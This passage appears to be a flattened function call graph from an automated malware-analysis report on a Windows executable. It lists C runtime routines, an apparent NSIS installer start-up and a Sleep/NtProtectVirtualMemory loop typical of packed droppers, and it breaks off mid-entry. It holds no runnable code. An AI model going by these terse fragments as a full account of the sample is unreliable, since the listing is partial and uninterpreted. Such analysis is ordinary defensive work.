6421 1fab4b63 GetProcAddress 6420->6421 6424 1fab4b78 6420->6424 6421->6424 6422 1fab4b8c FreeLibrary 6423 1fab4b95 6422->6423 6425 1fab2ada _ValidateLocalCookies 5 API calls 6423->6425 6424->6422 6424->6423 6426 1fab4b9f 6425->6426 6426->6406 6427->6401 6446 1fab5132 6428->6446 6432 1fab4698 6431->6432 6433 1fab2ada _ValidateLocalCookies 5 API calls 6432->6433 6434 1fab46c1 6433->6434 6434->6409 6468 1fab56b9 RtlLeaveCriticalSection 6435->6468 6437 1fab4a7e 6437->6407 6437->6408 6469 1fab6025 6438->6469 6441 1fab4ae2 6443 1fab4b39 _abort 8 API calls 6441->6443 6442 1fab4ac2 GetPEB 6442->6441 6444 1fab4ad2 GetCurrentProcess TerminateProcess 6442->6444 6445 1fab4aea ExitProcess 6443->6445 6444->6441 6449 1fab50e1 6446->6449 6448 1fab5156 6448->6405 6450 1fab50ed ___scrt_is_nonwritable_in_current_image 6449->6450 6457 1fab5671 RtlEnterCriticalSection 6450->6457 6452 1fab50fb 6458 1fab515a 6452->6458 6456 1fab5119 _abort 6456->6448 6457->6452 6459 1fab517a 6458->6459 6463 1fab5182 6458->6463 6460 1fab2ada _ValidateLocalCookies 5 API calls 6459->6460 6461 1fab5108 6460->6461 6464 1fab5126 6461->6464 6462 1fab571e _free 20 API calls 6462->6459 6463->6459 6463->6462 6467 1fab56b9 RtlLeaveCriticalSection 6464->6467 6466 1fab5130 6466->6456 6467->6466 6468->6437 6470 1fab604a 6469->6470 6471 1fab6040 6469->6471 6472 1fab5c45 _abort 5 API calls 6470->6472 6473 1fab2ada _ValidateLocalCookies 5 API calls 6471->6473 6472->6471 6474 1fab4abe 6473->6474 6474->6441 6474->6442 7445 1fab5630 7446 1fab563b 7445->7446 7447 1fab5eb7 11 API calls 7446->7447 7448 1fab5664 7446->7448 7450 1fab5660 7446->7450 7447->7446 7451 1fab5688 7448->7451 7452 1fab56b4 7451->7452 7453 1fab5695 7451->7453 7452->7450 7454 1fab569f RtlDeleteCriticalSection 7453->7454 7454->7452 7454->7454 6479 1fab508a 6480 1fab509c 6479->6480 6481 1fab50a2 6479->6481 6483 1fab5000 6480->6483 6487 1fab502a 6483->6487 6488 1fab500d 6483->6488 6484 1fab5024 6486 1fab571e _free 20 API calls 6484->6486 6485 1fab571e _free 20 API calls 6485->6488 6486->6487 6487->6481 6488->6484 6488->6485 6489 1fab8a89 6492 1fab6d60 6489->6492 6493 1fab6d69 6492->6493 6495 1fab6d72 6492->6495 6496 1fab6c5f 6493->6496 6497 1fab5af6 _abort 38 API calls 6496->6497 6498 1fab6c6c 6497->6498 6516 1fab6d7e 6498->6516 6500 1fab6c74 6525 1fab69f3 6500->6525 6503 1fab6c8b 6503->6495 6504 1fab56d0 21 API calls 6505 1fab6c9c 6504->6505 6506 1fab6cce 6505->6506 6532 1fab6e20 6505->6532 6509 1fab571e _free 20 API calls 6506->6509 6509->6503 6510 1fab6cc9 6511 1fab6368 __dosmaperr 20 API calls 6510->6511 6511->6506 6512 1fab6d12 6512->6506 6542 1fab68c9 6512->6542 6513 1fab6ce6 6513->6512 6514 1fab571e _free 20 API calls 6513->6514 6514->6512 6517 1fab6d8a ___scrt_is_nonwritable_in_current_image 6516->6517 6518 1fab5af6 _abort 38 API calls 6517->6518 6523 1fab6d94 6518->6523 6520 1fab6e18 _abort 6520->6500 6522 1fab55a8 _abort 38 API calls 6522->6523 6523->6520 6523->6522 6524 1fab571e _free 20 API calls 6523->6524 6545 1fab5671 RtlEnterCriticalSection 6523->6545 6546 1fab6e0f 6523->6546 6524->6523 6550 1fab54a7 6525->6550 6528 1fab6a26 6530 1fab6a3d 6528->6530 6531 1fab6a2b GetACP 6528->6531 6529 1fab6a14 GetOEMCP 6529->6530 6530->6503 6530->6504 6531->6530 6533 1fab69f3 40 API calls 6532->6533 6534 1fab6e3f 6533->6534 6537 1fab6e90 IsValidCodePage 6534->6537 6539 1fab6e46 6534->6539 6541 1fab6eb5 ___scrt_fastfail 6534->6541 6535 1fab2ada _ValidateLocalCookies 5 API calls 6536 1fab6cc1 6535->6536 6536->6510 6536->6513 6538 1fab6ea2 GetCPInfo 6537->6538 6537->6539 6538->6539 6538->6541 6539->6535 6697 1fab6acb GetCPInfo 6541->6697 6770 1fab6886 6542->6770 6544 1fab68ed 6544->6506 6545->6523 6549 1fab56b9 RtlLeaveCriticalSection 6546->6549 6548 1fab6e16 6548->6523 6549->6548 6551 1fab54ba 6550->6551 6552 1fab54c4 6550->6552 6551->6528 6551->6529 6552->6551 6553 1fab5af6 _abort 38 API calls 6552->6553 6554 1fab54e5 6553->6554 6558 1fab7a00 6554->6558 6559 1fab54fe 6558->6559 6560 1fab7a13 6558->6560 6562 1fab7a2d 6559->6562 6560->6559 6566 1fab7f0f 6560->6566 6563 1fab7a40 6562->6563 6564 1fab7a55 6562->6564 6563->6564 6565 1fab6d7e __fassign 38 API calls 6563->6565 6564->6551 6565->6564 6567 1fab7f1b ___scrt_is_nonwritable_in_current_image 6566->6567 6568 1fab5af6 _abort 38 API calls 6567->6568 6569 1fab7f24 6568->6569 6573 1fab7f72 _abort 6569->6573 6578 1fab5671 RtlEnterCriticalSection 6569->6578 6571 1fab7f42 6579 1fab7f86 6571->6579 6573->6559 6577 1fab55a8 _abort 38 API calls 6577->6573 6578->6571 6580 1fab7f94 __fassign 6579->6580 6582 1fab7f56 6579->6582 6580->6582 6586 1fab7cc2 6580->6586 6583 1fab7f75 6582->6583 6696 1fab56b9 RtlLeaveCriticalSection 6583->6696 6585 1fab7f69 6585->6573 6585->6577 6588 1fab7d42 6586->6588 6589 1fab7cd8 6586->6589 6590 1fab571e _free 20 API calls 6588->6590 6612 1fab7d90 6588->6612 6589->6588 6595 1fab571e _free 20 API calls 6589->6595 6610 1fab7d0b 6589->6610 6591 1fab7d64 6590->6591 6592 1fab571e _free 20 API calls 6591->6592 6593 1fab7d77 6592->6593 6596 1fab571e _free 20 API calls 6593->6596 6594 1fab571e _free 20 API calls 6598 1fab7d37 6594->6598 6600 1fab7d00 6595->6600 6601 1fab7d85 6596->6601 6597 1fab571e _free 20 API calls 6602 1fab7d22 6597->6602 6603 1fab571e _free 20 API calls 6598->6603 6599 1fab7dfe 6604 1fab571e _free 20 API calls 6599->6604 6614 1fab90ba 6600->6614 6607 1fab571e _free 20 API calls 6601->6607 6642 1fab91b8 6602->6642 6603->6588 6609 1fab7e04 6604->6609 6606 1fab571e 20 API calls _free 6611 1fab7d9e 6606->6611 6607->6612 6609->6582 6610->6597 6613 1fab7d2d 6610->6613 6611->6599 6611->6606 6654 1fab7e35 6612->6654 6613->6594 6616 1fab90cb 6614->6616 6641 1fab91b4 6614->6641 6615 1fab90dc 6618 1fab90ee 6615->6618 6619 1fab571e _free 20 API calls 6615->6619 6616->6615 6617 1fab571e _free 20 API calls 6616->6617 6617->6615 6620 1fab9100 6618->6620 6621 1fab571e _free 20 API calls 6618->6621 6619->6618 6622 1fab9112 6620->6622 6623 1fab571e _free 20 API calls 6620->6623 6621->6620 6624 1fab9124 6622->6624 6625 1fab571e _free 20 API calls 6622->6625 6623->6622 6626 1fab9136 6624->6626 6627 1fab571e _free 20 API calls 6624->6627 6625->6624 6628 1fab9148 6626->6628 6629 1fab571e _free 20 API calls 6626->6629 6627->6626 6630 1fab915a 6628->6630 6631 1fab571e _free 20 API calls 6628->6631 6629->6628 6632 1fab916c 6630->6632 6633 1fab571e _free 20 API calls 6630->6633 6631->6630 6634 1fab917e 6632->6634 6635 1fab571e _free 20 API calls 6632->6635 6633->6632 6636 1fab9190 6634->6636 6637 1fab571e _free 20 API calls 6634->6637 6635->6634 6638 1fab91a2 6636->6638 6639 1fab571e _free 20 API calls 6636->6639 6637->6636 6640 1fab571e _free 20 API calls 6638->6640 6638->6641 6639->6638 6640->6641 6641->6610 6643 1fab91c5 6642->6643 6653 1fab921d 6642->6653 6644 1fab91d5 6643->6644 6645 1fab571e _free 20 API calls 6643->6645 6646 1fab91e7 6644->6646 6648 1fab571e _free 20 API calls 6644->6648 6645->6644 6647 1fab91f9 6646->6647 6649 1fab571e _free 20 API calls 6646->6649 6650 1fab920b 6647->6650 6651 1fab571e _free 20 API calls 6647->6651 6648->6646 6649->6647 6652 1fab571e _free 20 API calls 6650->6652 6650->6653 6651->6650 6652->6653 6653->6613 6655 1fab7e60 6654->6655 6656 1fab7e42 6654->6656 6655->6611 6656->6655 6660 1fab925d 6656->6660 6659 1fab571e _free 20 API calls 6659->6655 6661 1fab7e5a 6660->6661 6662 1fab926e 6660->6662 6661->6659 6663 1fab9221 __fassign 20 API calls 6662->6663 6664 1fab9276 6663->6664 6665 1fab9221 __fassign 20 API calls 6664->6665 6666 1fab9281 6665->6666 6667 1fab9221 __fassign 20 API calls 6666->6667 6668 1fab928c 6667->6668 6669 1fab9221 __fassign 20 API calls 6668->6669 6670 1fab9297 6669->6670 6671 1fab9221 __fassign 20 API calls 6670->6671 6672 1fab92a5 6671->6672 6673 1fab571e _free 20 API calls 6672->6673 6674 1fab92b0 6673->6674 6675 1fab571e _free 20 API calls 6674->6675 6676 1fab92bb 6675->6676 6677 1fab571e _free 20 API calls 6676->6677 6678 1fab92c6 6677->6678 6679 1fab9221 __fassign 20 API calls 6678->6679 6680 1fab92d4 6679->6680 6681 1fab9221 __fassign 20 API calls 6680->6681 6682 1fab92e2 6681->6682 6683 1fab9221 __fassign 20 API calls 6682->6683 6684 1fab92f3 6683->6684 6685 1fab9221 __fassign 20 API calls 6684->6685 6686 1fab9301 6685->6686 6687 1fab9221 __fassign 20 API calls 6686->6687 6688 1fab930f 6687->6688 6689 1fab571e _free 20 API calls 6688->6689 6690 1fab931a 6689->6690 6691 1fab571e _free 20 API calls 6690->6691 6692 1fab9325 6691->6692 6693 1fab571e _free 20 API calls 6692->6693 6694 1fab9330 6693->6694 6695 1fab571e _free 20 API calls 6694->6695 6695->6661 6696->6585 6698 1fab6b05 6697->6698 6706 1fab6baf 6697->6706 6707 1fab86e4 6698->6707 6700 1fab2ada _ValidateLocalCookies 5 API calls 6702 1fab6c5b 6700->6702 6702->6539 6705 1fab8a3e 43 API calls 6705->6706 6706->6700 6708 1fab54a7 __fassign 38 API calls 6707->6708 6709 1fab8704 MultiByteToWideChar 6708->6709 6711 1fab87da 6709->6711 6712 1fab8742 6709->6712 6713 1fab2ada _ValidateLocalCookies 5 API calls 6711->6713 6714 1fab56d0 21 API calls 6712->6714 6717 1fab8763 ___scrt_fastfail 6712->6717 6715 1fab6b66 6713->6715 6714->6717 6721 1fab8a3e 6715->6721 6716 1fab87d4 6726 1fab8801 6716->6726 6717->6716 6719 1fab87a8 MultiByteToWideChar 6717->6719 6719->6716 6720 1fab87c4 GetStringTypeW 6719->6720 6720->6716 6722 1fab54a7 __fassign 38 API calls 6721->6722 6723 1fab8a51 6722->6723 6730 1fab8821 6723->6730 6727 1fab881e 6726->6727 6728 1fab880d 6726->6728 6727->6711 6728->6727 6729 1fab571e _free 20 API calls 6728->6729 6729->6727 6732 1fab883c 6730->6732 6731 1fab8862 MultiByteToWideChar 6733 1fab8a16 6731->6733 6734 1fab888c 6731->6734 6732->6731 6735 1fab2ada _ValidateLocalCookies 5 API calls 6733->6735 6737 1fab56d0 21 API calls 6734->6737 6739 1fab88ad 6734->6739 6736 1fab6b87 6735->6736 6736->6705 6737->6739 6738 1fab88f6 MultiByteToWideChar 6740 1fab890f 6738->6740 6753 1fab8962 6738->6753 6739->6738 6739->6753 6757 1fab5f19 6740->6757 6742 1fab8801 __freea 20 API calls 6742->6733 6744 1fab8939 6748 1fab5f19 11 API calls 6744->6748 6744->6753 6745 1fab8971 6746 1fab56d0 21 API calls 6745->6746 6751 1fab8992 6745->6751 6746->6751 6747 1fab8a07 6750 1fab8801 __freea 20 API calls 6747->6750 6748->6753 6749 1fab5f19 11 API calls 6752 1fab89e6 6749->6752 6750->6753 6751->6747 6751->6749 6752->6747 6754 1fab89f5 WideCharToMultiByte 6752->6754 6753->6742 6754->6747 6755 1fab8a35 6754->6755 6756 1fab8801 __freea 20 API calls 6755->6756 6756->6753 6758 1fab5c45 _abort 5 API calls 6757->6758 6759 1fab5f40 6758->6759 6762 1fab5f49 6759->6762 6765 1fab5fa1 6759->6765 6763 1fab2ada _ValidateLocalCookies 5 API calls 6762->6763 6764 1fab5f9b 6763->6764 6764->6744 6764->6745 6764->6753 6766 1fab5c45 _abort 5 API calls 6765->6766 6767 1fab5fc8 6766->6767 6768 1fab2ada _ValidateLocalCookies 5 API calls 6767->6768 6769 1fab5f89 LCMapStringW 6768->6769 6769->6762 6771 1fab6892 ___scrt_is_nonwritable_in_current_image 6770->6771 6778 1fab5671 RtlEnterCriticalSection 6771->6778 6773 1fab689c 6779 1fab68f1 6773->6779 6777 1fab68b5 _abort 6777->6544 6778->6773 6791 1fab7011 6779->6791 6781 1fab693f 6782 1fab7011 26 API calls 6781->6782 6783 1fab695b 6782->6783 6784 1fab7011 26 API calls 6783->6784 6785 1fab6979 6784->6785 6786 1fab68a9 6785->6786 6787 1fab571e _free 20 API calls 6785->6787 6788 1fab68bd 6786->6788 6787->6786 6805 1fab56b9 RtlLeaveCriticalSection 6788->6805 6790 1fab68c7 6790->6777 6792 1fab7022 6791->6792 6801 1fab701e 6791->6801 6793 1fab7029 6792->6793 6795 1fab703c ___scrt_fastfail 6792->6795 6794 1fab6368 __dosmaperr 20 API calls 6793->6794 6796 1fab702e 6794->6796 6798 1fab706a 6795->6798 6799 1fab7073 6795->6799 6795->6801 6797 1fab62ac _abort 26 API calls 6796->6797 6797->6801 6800 1fab6368 __dosmaperr 20 API calls 6798->6800 6799->6801 6803 1fab6368 __dosmaperr 20 API calls 6799->6803 6802 1fab706f 6800->6802 6801->6781 6804 1fab62ac _abort 26 API calls 6802->6804 6803->6802 6804->6801 6805->6790 7455 1fab220c 7456 1fab221a dllmain_dispatch 7455->7456 7457 1fab2215 7455->7457 7459 1fab22b1 7457->7459 7460 1fab22c7 7459->7460 7462 1fab22d0 7460->7462 7463 1fab2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7460->7463 7462->7456 7463->7462 7464 1fab5303 7467 1fab50a5 7464->7467 7476 1fab502f 7467->7476 7470 1fab502f 5 API calls 7471 1fab50c3 7470->7471 7472 1fab5000 20 API calls 7471->7472 7473 1fab50ce 7472->7473 7474 1fab5000 20 API calls 7473->7474 7475 1fab50d9 7474->7475 7477 1fab5048 7476->7477 7478 1fab2ada _ValidateLocalCookies 5 API calls 7477->7478 7479 1fab5069 7478->7479 7479->7470 7480 1fab7103 GetCommandLineA GetCommandLineW 6806 1fab7a80 6807 1fab7a8d 6806->6807 6808 1fab637b _abort 20 API calls 6807->6808 6809 1fab7aa7 6808->6809 6810 1fab571e _free 20 API calls 6809->6810 6811 1fab7ab3 6810->6811 6812 1fab637b _abort 20 API calls 6811->6812 6816 1fab7ad9 6811->6816 6813 1fab7acd 6812->6813 6815 1fab571e _free 20 API calls 6813->6815 6815->6816 6817 1fab7ae5 6816->6817 6818 1fab5eb7 6816->6818 6819 1fab5c45 _abort 5 API calls 6818->6819 6820 1fab5ede 6819->6820 6821 1fab5efc InitializeCriticalSectionAndSpinCount 6820->6821 6822 1fab5ee7 6820->6822 6821->6822 6823 1fab2ada _ValidateLocalCookies 5 API calls 6822->6823 6824 1fab5f13 6823->6824 6824->6816 6825 1fab4a9a 6826 1fab5411 38 API calls 6825->6826 6827 1fab4aa2 6826->6827 7481 1fab2418 7482 1fab2420 ___scrt_release_startup_lock 7481->7482 7485 1fab47f5 7482->7485 7484 1fab2448 7486 1fab4808 7485->7486 7487 1fab4804 7485->7487 7490 1fab4815 7486->7490 7487->7484 7491 1fab5b7a _abort 20 API calls 7490->7491 7494 1fab482c 7491->7494 7492 1fab2ada _ValidateLocalCookies 5 API calls 7493 1fab4811 7492->7493 7493->7484 7494->7492 7495 1fab281c 7498 1fab2882 7495->7498 7501 1fab3550 7498->7501 7500 1fab282a 7502 1fab358a 7501->7502 7503 1fab355d 7501->7503 7502->7500 7503->7502 7503->7503 7504 1fab47e5 ___std_exception_copy 21 API calls 7503->7504 7505 1fab357a 7504->7505 7505->7502 7506 1fab544d ___std_exception_copy 26 API calls 7505->7506 7506->7502 6828 1fab3c90 RtlUnwind 7507 1fabac6b 7508 1fabac84 __startOneArgErrorHandling 7507->7508 7510 1fabacad __startOneArgErrorHandling 7508->7510 7511 1fabb2f0 7508->7511 7512 1fabb329 __startOneArgErrorHandling 7511->7512 7514 1fabb350 __startOneArgErrorHandling 7512->7514 7522 1fabb5c1 7512->7522 7515 1fabb393 7514->7515 7516 1fabb36e 7514->7516 7535 1fabb8b2 7515->7535 7526 1fabb8e1 7516->7526 7519 1fabb38e __startOneArgErrorHandling 7520 1fab2ada _ValidateLocalCookies 5 API calls 7519->7520 7521 1fabb3b7 7520->7521 7521->7510 7523 1fabb5ec __raise_exc 7522->7523 7524 1fabb7e5 RaiseException 7523->7524 7525 1fabb7fd 7524->7525 7525->7514 7527 1fabb8f0 7526->7527 7528 1fabb90f __startOneArgErrorHandling 7527->7528 7529 1fabb964 __startOneArgErrorHandling 7527->7529 7542 1fab78a3 7528->7542 7530 1fabb8b2 __startOneArgErrorHandling 20 API calls 7529->7530 7534 1fabb95d 7530->7534 7533 1fabb8b2 __startOneArgErrorHandling 20 API calls 7533->7534 7534->7519 7536 1fabb8bf 7535->7536 7537 1fabb8d4 7535->7537 7539 1fabb8d9 7536->7539 7540 1fab6368 __dosmaperr 20 API calls 7536->7540 7538 1fab6368 __dosmaperr 20 API calls 7537->7538 7538->7539 7539->7519 7541 1fabb8cc 7540->7541 7541->7519 7545 1fab78cb 7542->7545 7543 1fab2ada _ValidateLocalCookies 5 API calls 7544 1fab78e8 7543->7544 7544->7533 7544->7534 7545->7543 7546 1fab506f 7547 1fab5087 7546->7547 7548 1fab5081 7546->7548 7549 1fab5000 20 API calls 7548->7549 7549->7547 7550 1fab9d61 7551 1fab9d81 7550->7551 7554 1fab9db8 7551->7554 7553 1fab9dab 7555 1fab9dbf 7554->7555 7556 1fab9e20 7555->7556 7560 1fab9ddf 7555->7560 7558 1faba90e 7556->7558 7563 1fabaa17 7556->7563 7558->7553 7560->7558 7561 1fabaa17 21 API calls 7560->7561 7562 1faba93e 7561->7562 7562->7553 7564 1fabaa20 7563->7564 7567 1fabb19b 7564->7567 7568 1fabb1da __startOneArgErrorHandling 7567->7568 7573 1fabb25c __startOneArgErrorHandling 7568->7573 7577 1fabb59e 7568->7577 7570 1fabb286 7571 1fabb8b2 __startOneArgErrorHandling 20 API calls 7570->7571 7572 1fabb292 7570->7572 7571->7572 7575 1fab2ada _ValidateLocalCookies 5 API calls 7572->7575 7573->7570 7574 1fab78a3 __startOneArgErrorHandling 5 API calls 7573->7574 7574->7570 7576 1fab9e6e 7575->7576 7576->7553 7578 1fabb5c1 __raise_exc RaiseException 7577->7578 7579 1fabb5bc 7578->7579 7579->7573 6829 1faba1e0 6832 1faba1fe 6829->6832 6831 1faba1f6 6833 1faba203 6832->6833 6835 1faba298 6833->6835 6837 1fabaa53 6833->6837 6835->6831 6838 1fabaa70 RtlDecodePointer 6837->6838 6839 1fabaa80 6837->6839 6838->6839 6841 1fabab02 6839->6841 6843 1fabab0d 6839->6843 6845 1fabaab7 6839->6845 6840 1fab2ada _ValidateLocalCookies 5 API calls 6842 1faba42f 6840->6842 6841->6840 6842->6831 6843->6841 6844 1fab6368 __dosmaperr 20 API calls 6843->6844 6844->6841 6845->6841 6846 1fab6368 __dosmaperr 20 API calls 6845->6846 6846->6841 7580 1fab7260 GetStartupInfoW 7581 1fab7318 7580->7581 7582 1fab7286 7580->7582 7582->7581 7583 1fab8be3 27 API calls 7582->7583 7584 1fab72af 7583->7584 7584->7581 7585 1fab72dd GetFileType 7584->7585 7585->7584 6847 403311 SetErrorMode GetVersion 6848 403357 6847->6848 6868 40642b GetSystemDirectoryW 6848->6868 6850 403362 lstrlenA 6850->6848 6851 403372 6850->6851 6871 40649b GetModuleHandleA 6851->6871 6854 40649b 5 API calls 6855 403381 #17 OleInitialize SHGetFileInfoW 6854->6855 6877 4060c1 lstrcpynW 6855->6877 6857 4033be GetCommandLineW 6878 4060c1 lstrcpynW 6857->6878 6859 4033d0 GetModuleHandleW 6860 4033f0 6859->6860 6879 405aa2 6860->6879 6863 403521 GetTempPathW 6883 4032e0 6863->6883 6865 403539 DeleteFileW 6867 402e82 6865->6867 6869 40644d wsprintfW LoadLibraryExW 6868->6869 6869->6850 6872 4064c1 GetProcAddress 6871->6872 6873 4064b7 6871->6873 6875 40337a 6872->6875 6874 40642b 3 API calls 6873->6874 6876 4064bd 6874->6876 6875->6854 6876->6872 6876->6875 6877->6857 6878->6859 6880 405aa8 6879->6880 6881 4033f7 CharNextW 6880->6881 6882 405aaf CharNextW 6880->6882 6881->6863 6882->6880 6893 406355 6883->6893 6885 4032f6 6885->6865 6886 4032ec 6886->6885 6902 405a75 lstrlenW CharPrevW 6886->6902 6900 406362 6893->6900 6894 4063d8 6895 4063dd CharPrevW 6894->6895 6897 4063fe 6894->6897 6895->6894 6896 4063cb CharNextW 6896->6894 6896->6900 6897->6886 6898 405aa2 CharNextW 6898->6900 6899 4063b7 CharNextW 6899->6900 6900->6894 6900->6896 6900->6898 6900->6899 6901 4063c6 CharNextW 6900->6901 6901->6896 6903 405a91 lstrcatW 6902->6903 6904 4032fe 6902->6904 6903->6904 6905 40576c CreateDirectoryW 6904->6905 6906 405780 GetLastError 6905->6906 6907 403304 6905->6907 6906->6907 6908 405cc5 6907->6908 6909 405cd2 GetTickCount GetTempFileNameW 6908->6909 6910 40330f 6909->6910 6911 405d08 6909->6911 6910->6865 6911->6909 6911->6910 6171 2237270 6172 22372ac 6171->6172 6172->6171 6173 22372d2 Sleep 6172->6173 6174 223733a NtProtectVirtualMemory 6172->6174 6173->6171 6174->6172 6912 1fab5bff 6920 1fab5d5c 6912->6920 6915 1fab5b7a _abort 20 API calls 6916 1fab5c1b 6915->6916 6917 1fab5c28 6916->6917 6927 1fab5c2b 6916->6927 6919 1fab5c13 6921 1fab5c45 _abort 5 API calls 6920->6921 6922 1fab5d83 6921->6922 6923 1fab5d9b TlsAlloc 6922->6923 6924 1fab5d8c 6922->6924 6923->6924 6925 1fab2ada _ValidateLocalCookies 5 API calls 6924->6925 6926 1fab5c09 6925->6926 6926->6915 6926->6919 6928 1fab5c3b 6927->6928 6929 1fab5c35 6927->6929 6928->6919 6931 1fab5db2 6929->6931 6932 1fab5c45 _abort 5 API calls 6931->6932 6933 1fab5dd9 6932->6933 6934 1fab5df1 TlsFree 6933->6934 6935 1fab5de5 6933->6935 6934->6935 6936 1fab2ada _ValidateLocalCookies 5 API calls 6935->6936 6937 1fab5e02 6936->6937 6937->6928 7586 405c96 GetFileAttributesW CreateFileW 7587 1fab9e71 7588 1fab9e95 7587->7588 7589 1fab9eae 7588->7589 7591 1fabac6b __startOneArgErrorHandling 7588->7591 7590 1fabaa53 21 API calls 7589->7590 7592 1fab9ef8 7589->7592 7590->7592 7593 1fabb2f0 21 API calls 7591->7593 7594 1fabacad __startOneArgErrorHandling 7591->7594 7593->7594 6938 1fab63f0 6939 1fab6400 6938->6939 6950 1fab6416 6938->6950 6940 1fab6368 __dosmaperr 20 API calls 6939->6940 6941 1fab6405 6940->6941 6943 1fab62ac _abort 26 API calls 6941->6943 6944 1fab640f 6943->6944 6946 1fab64ee 6948 1fab571e _free 20 API calls 6946->6948 6947 1fab64e5 6947->6946 6954 1fab6573 6947->6954 6974 1fab85eb 6947->6974 6949 1fab6561 6948->6949 6983 1fab679a 6949->6983 6950->6949 6952 1fab6480 6950->6952 6957 1fab6580 6950->6957 6968 1fab4e76 6952->6968 6955 1fab62bc _abort 11 API calls 6954->6955 6956 1fab657f 6955->6956 6958 1fab658c 6957->6958 6958->6958 6959 1fab637b _abort 20 API calls 6958->6959 6960 1fab65ba 6959->6960 6961 1fab85eb 26 API calls 6960->6961 6962 1fab65e6 6961->6962 6963 1fab62bc _abort 11 API calls 6962->6963 6964 1fab6615 ___scrt_fastfail 6963->6964 6965 1fab66b6 FindFirstFileExA 6964->6965 6966 1fab6705 6965->6966 6967 1fab6580 26 API calls 6966->6967 6969 1fab4e87 6968->6969 6970 1fab4e8b 6968->6970 6969->6947 6970->6969 6971 1fab637b _abort 20 API calls 6970->6971 6972 1fab4eb9 6971->6972 6973 1fab571e _free 20 API calls 6972->6973 6973->6969 6977 1fab853a 6974->6977 6975 1fab854f 6976 1fab6368 __dosmaperr 20 API calls 6975->6976 6978 1fab8554 6975->6978 6982 1fab857a 6976->6982 6977->6975 6977->6978 6980 1fab858b 6977->6980 6978->6947 6979 1fab62ac _abort 26 API calls 6979->6978 6980->6978 6981 1fab6368 __dosmaperr 20 API calls 6980->6981 6981->6982 6982->6979 6984 1fab67a4 6983->6984 6985 1fab67b4 6984->6985 6987 1fab571e _free 20 API calls 6984->6987 6986 1fab571e _free 20 API calls 6985->6986 6988 1fab67bb 6986->6988 6987->6984 6988->6944 7595 1fab3370 7606 1fab3330 7595->7606 7607 1fab334f 7606->7607 7608 1fab3342 7606->7608 7609 1fab2ada _ValidateLocalCookies 5 API calls 7608->7609 7609->7607 7610 1fab2049 7612 1fab2055 ___scrt_is_nonwritable_in_current_image 7610->7612 7611 1fab205e 7612->7611 7613 1fab207d 7612->7613 7614 1fab20d3 7612->7614 7624 1fab244c 7613->7624 7615 1fab2639 ___scrt_fastfail 4 API calls 7614->7615 7618 1fab20da 7615->7618 7617 1fab2082 7633 1fab2308 7617->7633 7620 1fab2087 __RTC_Initialize 7636 1fab20c4 7620->7636 7622 1fab209f 7639 1fab260b 7622->7639 7625 1fab2451 ___scrt_release_startup_lock 7624->7625 7626 1fab2455 7625->7626 7630 1fab2461 7625->7630 7627 1fab527a _abort 20 API calls 7626->7627 7628 1fab245f 7627->7628 7628->7617 7629 1fab246e 7629->7617 7630->7629 7631 1fab499b _abort 28 API calls 7630->7631 7632 1fab4bbd 7631->7632 7632->7617 7645 1fab34c7 RtlInterlockedFlushSList 7633->7645 7635 1fab2312 7635->7620 7647 1fab246f 7636->7647 7638 1fab20c9 ___scrt_release_startup_lock 7638->7622 7640 1fab2617 7639->7640 7641 1fab262d 7640->7641 7655 1fab53ed 7640->7655 7641->7611 7644 1fab3529 ___vcrt_uninitialize 8 API calls 7644->7641 7646 1fab34d7 7645->7646 7646->7635 7652 1fab53ff 7647->7652 7650 1fab391b ___vcrt_uninitialize_ptd 6 API calls 7651 1fab354d 7650->7651 7651->7638 7653 1fab5c2b 11 API calls 7652->7653 7654 1fab2476 7653->7654 7654->7650 7658 1fab74da 7655->7658 7661 1fab74f3 7658->7661 7659 1fab2ada _ValidateLocalCookies 5 API calls 7660 1fab2625 7659->7660 7660->7644 7661->7659 7662 1fab5348 7663 1fab3529 ___vcrt_uninitialize 8 API calls 7662->7663 7664 1fab534f 7663->7664 7665 1fab7b48 7675 1fab8ebf 7665->7675 7669 1fab7b55 7688 1fab907c 7669->7688 7672 1fab7b7f 7673 1fab571e _free 20 API calls 7672->7673 7674 1fab7b8a 7673->7674 7692 1fab8ec8 7675->7692 7677 1fab7b50 7678 1fab8fdc 7677->7678 7679 1fab8fe8 ___scrt_is_nonwritable_in_current_image 7678->7679 7712 1fab5671 RtlEnterCriticalSection 7679->7712 7681 1fab905e 7726 1fab9073 7681->7726 7683 1fab906a _abort 7683->7669 7684 1fab8ff3 7684->7681 7685 1fab9032 RtlDeleteCriticalSection 7684->7685 7713 1faba09c 7684->7713 7687 1fab571e _free 20 API calls 7685->7687 7687->7684 7689 1fab9092 7688->7689 7690 1fab7b64 RtlDeleteCriticalSection 7688->7690 7689->7690 7691 1fab571e _free 20 API calls 7689->7691 7690->7669 7690->7672 7691->7690 7693 1fab8ed4 ___scrt_is_nonwritable_in_current_image 7692->7693 7702 1fab5671 RtlEnterCriticalSection 7693->7702 7695 1fab8f77 7707 1fab8f97 7695->7707 7698 1fab8ee3 7698->7695 7701 1fab8e78 66 API calls 7698->7701 7703 1fab7b94 RtlEnterCriticalSection 7698->7703 7704 1fab8f6d 7698->7704 7699 1fab8f83 _abort 7699->7677 7701->7698 7702->7698 7703->7698 7710 1fab7ba8 RtlLeaveCriticalSection 7704->7710 7706 1fab8f75 7706->7698 7711 1fab56b9 RtlLeaveCriticalSection 7707->7711 7709 1fab8f9e 7709->7699 7710->7706 7711->7709 7712->7684 7714 1faba0a8 ___scrt_is_nonwritable_in_current_image 7713->7714 7715 1faba0b9 7714->7715 7716 1faba0ce 7714->7716 7717 1fab6368 __dosmaperr 20 API calls 7715->7717 7724 1faba0c9 _abort 7716->7724 7729 1fab7b94 RtlEnterCriticalSection 7716->7729 7718 1faba0be 7717->7718 7720 1fab62ac _abort 26 API calls 7718->7720 7720->7724 7721 1faba0ea 7730 1faba026 7721->7730 7723 1faba0f5 7746 1faba112 7723->7746 7724->7684 7994 1fab56b9 RtlLeaveCriticalSection 7726->7994 7728 1fab907a 7728->7683 7729->7721 7731 1faba048 7730->7731 7732 1faba033 7730->7732 7737 1faba043 7731->7737 7749 1fab8e12 7731->7749 7733 1fab6368 __dosmaperr 20 API calls 7732->7733 7734 1faba038 7733->7734 7736 1fab62ac _abort 26 API calls 7734->7736 7736->7737 7737->7723 7739 1fab907c 20 API calls 7740 1faba064 7739->7740 7755 1fab7a5a 7740->7755 7742 1faba06a 7762 1fabadce 7742->7762 7745 1fab571e _free 20 API calls 7745->7737 7993 1fab7ba8 RtlLeaveCriticalSection 7746->7993 7748 1faba11a 7748->7724 7750 1fab8e2a 7749->7750 7754 1fab8e26 7749->7754 7751 